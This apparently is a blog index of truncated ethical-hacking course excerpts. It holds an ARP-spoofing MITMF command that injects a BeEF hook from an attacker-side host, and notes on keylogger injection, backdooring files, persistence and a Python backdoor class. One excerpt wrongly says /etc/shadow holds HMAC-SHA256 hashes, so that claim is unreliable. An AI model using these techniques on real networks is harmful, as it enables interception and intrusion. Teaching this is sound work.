Wireshark for Ethical Hackers - 4 Alfa Adapter is required which support wireless G/N. Parameter Value Chipset Realtek RTL8814AU WiFi Standards IEEE 802.11ac/a/b/g/n WiFi Frequency Dual Band 2.4GHz or 5GHz Antenna Connector RP-SMA female x 4
Wireshark for Ethical Hackers - 2 Interface Overview Start Wireshark in Kali Linux. HTTP Image Extracting filter: image-jfif Show packet bytes / Export packet bytes HTTP Passwords Target website: http://uploaded.net/login filter: HTTP filter: urlencod
Linux doesn’t store plaintext passwords. Instead, it stores an HMAC-SHA256 hash of the passwords in the file /etc/shadow. The permissions on the /etc/shadow/ file indicate that only the owner (root) and the group (shadow) can read the file, and that on
喜欢就关注我们吧! Hippocratic License( 一个加入了道德条款的开源许可证),以及第一个也是最流行的开源项目行为准则 — 贡献者公约(Contributor Covenant)的创建者 Coraline Ada Ehmke 宣布,成立一个新的非营利性开源组织:Ethical Source 组织(the Organization for Ethical Source,OES),以授
MAINTAINING ACCESS - Methods 1. Using a veil-evasion Rev_http_service Rev_tcp_service Use it instead of a normal backdoor. Or upload and execute from meterpreter. Does not always work. 2. Using persistence module run persistence -h Detectable by antivi
CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hoo
CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original(pdf, jpg, mp3) file to an
Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and find the target host. Scan restult - services: Scan resulst - Vulnerabilities: Scan result - credentials: Try to login the database using
Sever side attacks code execution Let‘s analyze the Zenmap scan result first and search for something vulnerabilities about Samba smbd 3.x. We find the following vulnerability and try to use it. https://www.rapid7.com/db/modules/exploit/multi/samba/
Detecting ARP Posionning Attacks ARP main security issues: 1. Each ARP requests/response is trusted. 2. Clients can accept responses even if they did not send a request. We can use the tool called Xarp(http://www.xarp.net/) to detect this kind attack.
MITM - Code Injection Inject javascript or HTML code into pages. Code gets executed on target machine. Use - - inject plugin. Code can be: 1. Stored on a local file --js-file or --html-file 2. Stored online --js-url or --html-url 3. Or you can supply th
MITM - Capturing Screen Of Target & Injecting a Keylogger ScreenShotter Plugin: ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a clients browser --screen Load plugin 'ScreenShotter' --interval SECONDS
Securing your Network From the Above Attacks. Now that we know how to test the security of all known wireless encryption(WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks as we know all the weaknesses that can be used by ha
Targeted packet sniffing airodump-ng --channel[channel] --bssid[bssid] --write[file-name][interface] Now all the data will be stored in the file name specified after the -write option. We can analyze this data using Wireshark. The only problem is that t
Implementing Code To Discover XSS in Parameters 1. Watch the URL of the XSS reflected page carefully. 2. Add the test_xss_in_link method in the Scanner class. #!/usr/bin/env pythonimport requestsimport refrom bs4 import BeautifulSoupfrom urllib.p
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to the web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check o
EXPLOITATION - XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/St
Polish the Python code using sending requests in a session Class Scanner. #!/usr/bin/env pythonimport requestsimport refrom urllib.parse import urljoinclass Scanner: def __init__(self, url, ignore_links): self.session = requests.Session()
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check of th
CRAWING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read page HTML. 2. Extract all links. 3. Repeat for each new link that is not already on the list. #!/usr/bin/env pythonimport reimport requestsfrom urllib.parse import url
Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whl
Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable -
Polish the Python code by adding the become_persistent function. #!/usr/bin/env pythonimport jsonimport socketimport subprocessimport osimport base64import sysimport shutilclass Backdoor: def __init__(self, ip, port): self.become_persistent()
Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: An incorrect command is sent. The correct command is miss-used. Listener: #!/usr/bin/env pythonimport socketimport jsonimport base64class Listener:
File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read the file as a sequence of characters. 2. Send this sequence of characters. 3. Create a new empty file at the destination. 4. Store the transferred sequence
